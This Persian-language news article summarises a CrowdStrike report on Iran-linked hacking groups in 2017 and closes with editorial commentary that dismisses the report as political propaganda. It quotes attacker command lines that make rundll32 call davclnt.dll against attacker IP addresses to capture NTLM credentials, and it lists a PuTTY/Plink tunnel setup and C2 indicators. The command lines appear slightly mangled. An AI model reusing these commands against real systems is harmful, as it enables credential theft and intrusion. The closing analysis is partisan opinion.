about-3 back-contact back-deep eitaa کانال روبیکاخبرگزاری سایبربان
مطالب پربازدید
ساخت
1403/09/24 - 08:40- آسیا

ساخت پیچیده‌ترین سلاح سایبری زیرساختی جهان توسط ایران

کارشناسان ادعا کردند که بدافزار مرتبط با ایران زیرساخت‌های حیاتی ایالات متحده و رژیم صهیونیستی را هدف قرار داده است.

راه‌اندازی
1403/09/28 - 07:37- آسیا

راه‌اندازی اولین کامپیوتر کوانتومی ساخت رژیم صهیونیستی

رژیم صهیونیستی از راه‌اندازی اولین کامپیوتر کوانتومی ساخت خود با استفاده از فناوری پیشرفته ابررسانا خبر داد.

امریکا همچنان به دنبال نوعی دست پیش گرفتن در ماجرای برجام است تا بعدازاین، هرگونه اقدام احتمالی در فضای سایبری را به ایران نسبت دهد.

به گزارش کارگروه بین الملل سایبربان؛ خبرگزاری نیویورک‌تایمز اخیرا خبری مبنی بر نگرانی کارشناسان امنیت سایبری امریکا و اسرائیل در رابطه با افزایش حملات تلافی‌جویانه از سوی ایران در پی تصمیم ترامپ برای خروج از برجام منتشر کرد.

مقدمه

این خبر که بر اساس گزارشی از موسسه کرود استرایک (Crowd Strike) منتشرشده مدعی است تحلیلگران واحد جنگ‌افزار پنتاگون، با نظارت بر ترافیک اینترنتی ایران دریافته‌اند که فعالیت‌های سایبری این کشور افزایش‌یافته است. به‌علاوه، کارشناسان نام‌برده هشدار داده‌اند که هکرهای ایرانی ایمیل‌های حاوی بدافزار به دیپلمات‌های مشغول در ادارات امور خارجه متحدان ایالات‌متحده و کارمندانشان در شرکت‌های مخابراتی، برای نفوذ به سامانه‌های کامپیوتری ارسال کرده‌اند. کارشناسان امنیتی موسسه امنیتی نام‌برده معتقدند که هکرهای ایرانی برای جمع‌آوری اطلاعات، در حال بررسی آدرس‌های اینترنتی متعلق به تأسیسات نظامی ایالات‌متحده در اروپا طی دو ماه گذشته هستند. به گفته آن‌ها، با امضای برجام حدود سه سال پیش، همسایگان خاورمیانه ایران معمولاً اهداف این هکرها بوده‌اند. در گزارش این شرکت امنیتی، تأکید شده است که زیرساخت‌های انرژی، نفت و گاز و زیرساخت‌های مالی آمریکایی، احتمالاً هدف حملات هکرهای ایرانی هستند.

این گزارش صرفاً در مورد ایران نیست و در آن به کشورهایی نظیر چین، روسیه یا کره شمالی هم اشاره‌شده است، ولی به دلیل گستردگی این گزارش، صرفاً بخش مربوط به ایران، موردبررسی قرارگرفته است.

متن گزارش

در گزارش شرکت امنیتی Crowd Strike آمده است:

در طی نیمه دوم سال 2017 فالکون اینتلیجنس (Falcon Intelligence)، شاهد افزایش حمله بدافزارها باهدف کاربران اینترنتی در مکان‌های فارسی‌زبان بود. گزارش منبع باز، دو مورد از بدافزارهای اخیر را در ماه‌های اکتبر و نوامبر 2017، به نام‌های تایرنت (TYRANT) و وانا اسمایل فهرست کرد. علیرغم اینکه گزارش‌ها حاکی از آن است که عملیات سایبری یادشده هردو طبیعتی مجرمانه داشتند، فالکون اینتلیجنس مدعی است دولت ایران و بازیگران حمایت‌شده دولتی، انگیزه‌ای برابر برای اقدام به این حملات داشتند.

بر اساس ادعای یک مقام دولتی ایران، شبکه نرم‌افزار سایفون، توسط اپراتورهای کمپین تایرنت به شکل جعلی ساخته‌شده بود. نرم‌افزار نام‌برده در ایران برای عبور از فیلترینگ دولتی به کار می‌رود. دولت ایران نیز در مورد هدف قرار دادن نرم‌افزارهای همه‌گیری چون سایفون سابقه طولانی دارد. چنانچه عملیات تایرنت به‌وسیله مسائل امنیتی داخلی انجام‌شده باشد، این موضوع ظرفیت توانایی دولت را برای ایجاد بستری به‌منظور ارتکاب جرم‌های سایبری و موارد استفاده نرم‌افزاری، مانند سایفون را نشان می‌دهد. در سال 2017 فالکون اینتلیجنس، با انجام یک بررسی اجمالی، فعالیت‌های مشکوکی را در چین، روسیه، ایران و کره شمالی شناسایی کرد. احتمال دارد این عملیات، در راستای کمک به نیازهای اطلاعاتی یا نظامی دولتی صورت گرفته باشد.

بیشتر اهداف عملیاتی که توسط ایران انجام‌شده است در مناطق غرب آسیا (خاورمیانه) و خصوصاً عربستان سعودی بوده است. شاخص‌ترین آن‌ها، به ابتدای سال 2017 بازمی‌گردد که‌موجی از حملات مخرب در ماه ژانویه تحت عنوان شمعون، زیرساخت‌های نفتی عربستان را هدف قرار داد.

 بر اساس ادعای گزارش یادشده موج حملات ژانویه 2017، ادامه حملات مخرب پایان سال 2016 بوده است. کرود استرایک از ارتباط میان شمعون ارتقا یافته و یک دشمن جدید به نام ولاتایل کیتن (VOLATILE KITTEN) آگاهی پیداکرده است. اگرچه که نشانه‌هایی از نقش چارمینگ کیتن (CHARMING KITTEN)، برای به دست آوردن دسترسی به شبکه‌ها جهت حملات دنباله‌دار در این عملیات دیده می‌شود.

این حملات در طول سال 2017 از طریق چارمینگ کیتن و هلیکس کیتن (HELIX KITTEN)، با توان عملیاتی بالا خطرات فراوانی را برای مخالفان سیاسی داخلی و خارجی به‌ویژه پیش از انتخابات ریاست جمهوری سال 1396 به همراه داشت. در گزارش یادشده از حملات هلیکس کیتن، برای ایجاد اختلال در طول سال 2017 در مناطق متعددی از آسیای غربی به‌ویژه عربستان سعودی نوشته‌شده است. بدافزار مخربی که در اغلب این حملات استفاده‌شده است، هلمینت نام دارد که طی زمان ارتقا یافت.

در طول سال 2017، فالکون اینتلیجنس، شاهد مستنداتی بود که ایران، عناصری از دکترین جنگ نرم را در عملیات سایبری خود گنجانده است. در این دکترین، به تعاریفی چون تلاش برای ایجاد موانع در برابر فشارهای سیاسی، اجتماعی و فرهنگی اشاره‌شده است. اقدام بالا پس از انتخابات سال 1392 با رشد جدی‌تری، به‌منظور نفوذ به مخاطبان داخلی از طریق انتشار اطلاعات غلط و خاموش کردن صدای مخالفان همراه بود.

دکترین جنگ نرم انگیزه اصلی در حمایت از حملات مخرب علیه گروه‌های فعال سیاسی بوده است. در ماه می 2017، فالکون اینتلیجنس، شاهد این بود که چارمینگ کیتن، گروه‌های مردم‌نهاد (NGO)، مخالفان سیاسی و جوامع فعال سیاسی را مورد هدف قرارداد. زیرساخت عظیمی که در این کمپین وجود داشت، در اواسط ماه آوریل یا اوایل ماه می ایجاد شد. در این گزارش پیش‌بینی‌شده با توجه به نوع ساختار این عملیات و بازه زمانی یادشده، این رفتار به‌منظور ارائه و ایجاد آگاهی وضعیتی، برای رهبری ایران پیش از انتخابات سال 1392 طراحی‌شده است. از دیگر اهداف دکترین جنگ نرم، جلوگیری از افزایش شیوع قدرت و فرهنگ غربی در داخل کشور است. ازجمله فعالیت‌های دیگر چارمینگ کیتن، می‌توان به حمله به کردهای عراق، جلوگیری از استقلال‌طلبی آن‌ها و اندیشکده های غربی، به منشور جلوگیری از فعالیت‌های ضد ایرانی آن‌ها اشاره کرد.

ایران در دکترین جنگ نرم خود همواره از گروه‌های هکری نیابتی برای جلوگیری از شناسایی ارتباط مستقیم دولت با هکرها استفاده کرده است. از فعالیت‌هایی که در این راستا صورت گرفت، می‌توان به حملات سایبری (DDOS) به برخی وب‌سایت‌های دولتی عربستان سعودی در پی حملات تروریستی داعش در تهران اشاره کرد. گفته‌شده به دلیل اظهارات مقامات ایرانی در رابطه ارتباط عربستان و داعش و زمان به وقوع پیوستن این حملات، سازمان‌های دولتی مانند سپاه پاسداران مسئول این اقدام بودند.

در ادامه این گزارش از ادامه اقدامات ایران در بررسی فعالیت‌های مخالفان داخلی، هم‌راستا با کنترل آگاهی وضعیتی از کشورهای همسایه و نفوذ احتمالی بیشتر علیه ایالات‌متحده نوشته‌شده است.

در مقدمه بخش دوم یافته‌های گزارش کرود استرایک آمده است که بخش قابل‌توجهی از تحرکات سایبری نامشروع دولت‌های مختلف، به افزایش چشم‌گیر فعالیت‌های ایران و کره شمالی مربوط می‌شود. در ادامه مشاهدات از تغییری در اولویت‌بندی اهداف روسیه و چین به سمت اندیشکده های غربی یادشده است.

در بخش حملات به زیرساخت‌ها و سازمان‌های رفاهی این گزارش آمده است:

در ماه اوت، یک گروه کیتن (در این گزارش، گروه کیتن برای هکرهای منتسب به ایران استفاده شده است) با استفاده از اعتبارنامه‌های موجود به سرورهای دو هتل زنجیره‌ای دسترسی پیدا کردند. با به‌کارگیری ابزار «SysInternals PsExec» برای اجرای دستور، بازیگران این حمله، سرویسی به نام «Microsoft Proxy Service» را نصب کردند. این سرویس با استفاده از پروتکل سفارشی‌سازی شده «Pink Secure Shell – SSH» از ترمینال پوتی «PuTTY»، یک شل رمزنگاری‌شده با زیر دامنه win7-update[.]com ساخته و پورت‌ها را از 3389 به 8516 در میزبان محلی انتقال داد. مهاجم، از طریق این پایانه به شبکه اینترنت متصل می‌شود. تحلیلگران گروه فالکون اینتلیجنس، در واحد فرماندهی و کنترل زیرساخت‌ها، به اشتراک مشهودی میان بازیگران این حمله و هلیکس کیتن پی بردند. به‌علاوه، نسخه پلینک (Plink) به‌کاررفته، یک نسخه سفارشی‌سازی شده بوده است. این‌گونه از رفتار، نمایانگر رشد توانمندی‌های بازیگرانی است که با عملیات سایبری ارتباط دارند.

در بخش حملات کیتن به سازمان‌های آسیای غربی نوشته‌شده است:
«ترفندهای مشاهده‌شده عبارت‌اند از افزایش امتیازات در بهره‌برداری از آسیب‌پذیری‌ها، دسترسی‌های اعتباری، اجرای (Rundll32) و فرماندهی و کنترل.
همانند افزایش تعداد حملات چولیما (CHOLLIMA) در سال 2017، اور واچ (OverWAtch) مظنون مهم‌تری به نام حملات کیتن را در همان سال شناسایی کرد. یکی از کارمندان یک شرکت پتروشیمی غرب آسیا در ماه جولای، از طریق یک ایمیل محتوی بدافزار، مورد هدف قرار گرفت.
بدافزار یادشده به دلیل حسگرهای موجود در سامانه میزبان (host)، نتوانست به‌طور کامل هدف را آلوده کند. تاکتیک و هدف این اقدام بسیار شبیه به رفتار کیتن بود. لینک آلوده به آدرس آی پی 51.255.24{.}88 شناخته شده است. بر اساس فالکون اینتلیجنس، نشانی مذکور به نام زیرساخت‌های هلیکس کیتن شناسایی و قبل از جاگذاری هلمینت، به‌عنوان فرماندهی و کنترل آن استفاده شد.
اور واچ بعدها در ماه سپتامبر شاهد یک آسیب وب استراتژیکی (SWC) در بستر وسیعی از صنایع بود. وب‌سایت انجمن قلب سعودی «ksacpr.org{.}sa» مورد هدف قرار گرفت و در پی این اتفاق، بازدیدکنندگان آن به دامنه آلوده و مخرب adobe-plugin{.}bid هدایت‌شده، در نشانی 188.165.187{.}235 قرار گرفتند. قربانیان به‌صورت خودکار اجازه تبادل اطلاعات را به سرورهای بیرونی هدایت‌شونده توسط مهاجم دادند.
بر اساس اطلاعات فالکون، زیرساخت‌های مخرب مشاهده‌شده بسیار شبیه به عملیات آسیب وب استراتژیکی به زیرساخت‌های حیاتی و انرژی امریکای شمالی در اوایل سال 2017 بود. دستور حملات به شکل زیر است:
run1132.exe C:\WINDOWS\system32\davclnt.d11,DavSetCookie 184.154.150{.}66
در حمله به انجمن قلب سعودی، دستور حملات مهاجم بسیار شبیه به نمونه بالا است. برای مثال:
run1132.exe C:\WINDOWS\system32\davclnt.d11,DavSetCookie 188.165.187{.}235
این نوع ارتباطات می‌تواند پروتکل امنیت داخلی «NTLM» را در برابر مهاجمان به نمایش درآورده و در آینده به‌صورت آفلاین موردحمله قرار گیرد. فالکون اینتلیجنس، فعالیت‌های آسیب وب استراتژیکی به زیرساخت‌های حیاتی و انرژی را به بازیگران روسی مرتبط ساخت. این در حالی است که حملات مشابه به وب‌سایت انجمن قلب سعودی را به بازیگران کیتن و ایران ارتباط می‌دهد.»

تحلیل

با توجه به رصد و شناسایی حملات متعدد و ارائه آمار و ارقام دقیق در این گزارش، نکته قابل‌توجه این است که همه اطلاعات موجود، مربوط به سال 2017 است. دو، اینکه در گزارش مذکور، هنوز سندی برای اثبات محتمل بودن حملات در این برهه کنونی، از جانب ایران اشاره نشده است و تنها تلاش شده با استفاده از مستندات قدیمی، احتمال بروز یک حمله سایبری به زیرساخت‌های کشورهای غربی داده شود. سوم اینکه به نظر می‌رسد با توجه به زمان انتشار این گزارش، آمریکا تنها به دنبال نوعی دست پیش گرفتن در ماجرای برجام است تا بعدازاین، هرگونه اقدام احتمالی در فضای سایبری را به ایران نسبت دهد.

نکته مهم دیگر، این است که این گزارش، اشاراتی هرچند محدود به دکترین جنگ نرم جمهوری اسلامی ایران کرده است که به نظر می‌رسد به عملیات سایبری ایران در حوزه شناختی مربوط باشد. اشاره به این نوع از حملات در گزارش‌های اخیر منتسب به ایران، در حال افزایش است. بدیهی است که همه نکات بالا می تواند یک وجه مشترک، آن هم برپایی یک پروپاگاندای سیاسی  و ادامه ایران هراسی سایبری برای گذر از این برهه زمانی در سطح بین المللی داشته باشد.
 

تازه ترین ها
آمادگی
1403/12/07 - 10:09- آمریکا

آمادگی کمتر از نیمی از شرکت‌های جهان در برابر حملات سایبری

کارشناسان اعلام کردند که با وجود افزایش حملات سایبری، کمتر از نیمی از تولیدکنندگان در جهان برای رویارویی با نقض‌های امنیتی آمادگی دارند.

عملکرد
1403/12/07 - 09:43- فناوری اطلاعات

عملکرد بهتر مغز انسان نسبت به هوش مصنوعی در پردازش متون طولانی

موسسه فناوری رژیم صهیونیستی ادعا کرد که مغز انسان در پردازش متن طولانی از هوش مصنوعی بهتر عمل می‌کند.

سرمایه‌گذاری
1403/12/07 - 09:35- آسیا

سرمایه‌گذاری پروف‌پوینت در امارات برای پیشبرد امنیت سایبری

شرکت امنیت سایبری پروف‌پوینت سرمایه‌گذاری در امارات متحده عربی را با هدف پاسخگویی به تقاضا برای خدمات امنیت سایبری مبتنی بر ابر تقویت کرد.